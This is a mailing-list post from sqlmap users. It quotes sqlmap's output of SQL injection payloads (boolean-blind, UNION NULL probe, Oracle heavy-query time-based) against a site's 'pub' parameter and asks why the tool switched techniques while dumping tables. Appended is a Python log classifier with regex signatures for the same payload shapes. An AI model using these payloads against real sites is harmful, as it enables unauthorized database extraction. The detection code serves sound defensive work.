[sqlmap-users] UNION and then Blind AND ???
From: Carlos S. <r3...@r3...> - 2013-07-28 03:52:01
Hi! I found an odd behavior in sqlmap. I threw it at a URL where it found this:

Place: GET
Parameter: pub
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: XXX=' OR '1'='1' AND 5523=5523 AND 'YIrb'='YIrb

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: XXX=' OR '1'='1' UNION ALL SELECT NULL,NULL,CHR(113)||CHR(97)||CHR(101)||CHR(98)||CHR(113)||CHR(69)||CHR(111)||CHR(119)||CHR(107)||CHR(115)||CHR(118)||CHR(118)||CHR(66)||CHR(98)||CHR(115)||CHR(113)||CHR(110)||CHR(109)||CHR(107)||CHR(113),NULL,NULL,NULL FROM DUAL--

    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind (heavy query)
    Payload: XXX=' OR '1'='1' AND 4237=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'DQxD'='DQxD

So, the best way to dump the DB would be to use the UNION query, since it can retrieve a whole table at a time. Now, the funny thing is that it actually used this for the first 4 or 5 tables, which are 5 or 6 columns wide, but then, on a table with only 3 columns, it didn't. It is now using a slow-moving AND boolean-based attack to dump the table char by char, but I can't understand why. Any known reason for this? Or am I just missing something?
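The three payload shapes sqlmap reported above are also what a defender sees in web access logs. The following is an added example, not code from the post or from the sqlmap project: it tags URL-decoded request paths by which of those technique shapes they resemble (the `OR '1'='1'` tautology prefix, the `AND n=n` boolean probe, the `UNION ALL SELECT NULL,...` column probe, and the `ALL_USERS` cross-join heavy query). The request lines are constructed for illustration; the path `/news` and parameter values are assumptions.

```python
import re
from typing import List
from urllib.parse import unquote_plus

# Constructed sample request paths (not real traffic). The first three mirror the
# boolean-based, UNION and heavy-query payloads from the post; the last is benign.
SAMPLE_REQUESTS = [
    "/news?pub=XXX%27+OR+%271%27%3D%271%27+AND+5523%3D5523+AND+%27YIrb%27%3D%27YIrb",
    "/news?pub=XXX%27+OR+%271%27%3D%271%27+UNION+ALL+SELECT+NULL%2CNULL%2C"
    "CHR%28113%29%7C%7CCHR%2897%29%2CNULL%2CNULL%2CNULL+FROM+DUAL--",
    "/news?pub=XXX%27+OR+%271%27%3D%271%27+AND+4237%3D%28SELECT+COUNT%28%2A%29"
    "+FROM+ALL_USERS+T1%2CALL_USERS+T2%29+AND+%27DQxD%27%3D%27DQxD",
    "/news?pub=2013-07",
]

# Each pattern mirrors one payload shape seen in the post. They are matched
# against the decoded query string, so URL encoding alone does not evade them.
SIGNATURES = [
    # OR '1'='1' : the tautology prefix shared by all three payloads
    ("tautology", re.compile(r"\bOR\s+'(\w+)'='\1'", re.I)),
    # AND 5523=5523 : same-number comparison used as a boolean-blind probe
    ("boolean-blind", re.compile(r"\bAND\s+(\d+)=\1\b", re.I)),
    # UNION ALL SELECT NULL,... : column-count / injectable-column probe
    ("union-query", re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b.*\bNULL\b", re.I | re.S)),
    # SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,... : Oracle heavy-query delay
    ("heavy-query-time-based", re.compile(r"\bSELECT\s+COUNT\(\*\)\s+FROM\s+ALL_USERS\b", re.I)),
]


def classify_request(path: str) -> List[str]:
    """Return the names of all payload shapes a request path resembles (decoded first)."""
    decoded = unquote_plus(path)
    return [name for name, pattern in SIGNATURES if pattern.search(decoded)]


def scan(paths: List[str]) -> List[List[str]]:
    """Classify every path; an empty list means no known shape matched."""
    return [classify_request(p) for p in paths]


if __name__ == "__main__":
    for path, tags in zip(SAMPLE_REQUESTS, scan(SAMPLE_REQUESTS)):
        print(tags or ["-"], unquote_plus(path))
```

Because the classifier works on the decoded query string, the same `AND n=n` rule flags each char-by-char boolean-blind request that the post describes sqlmap falling back to, which is why such fallbacks are so visible in logs: one request per bit or character of extracted data.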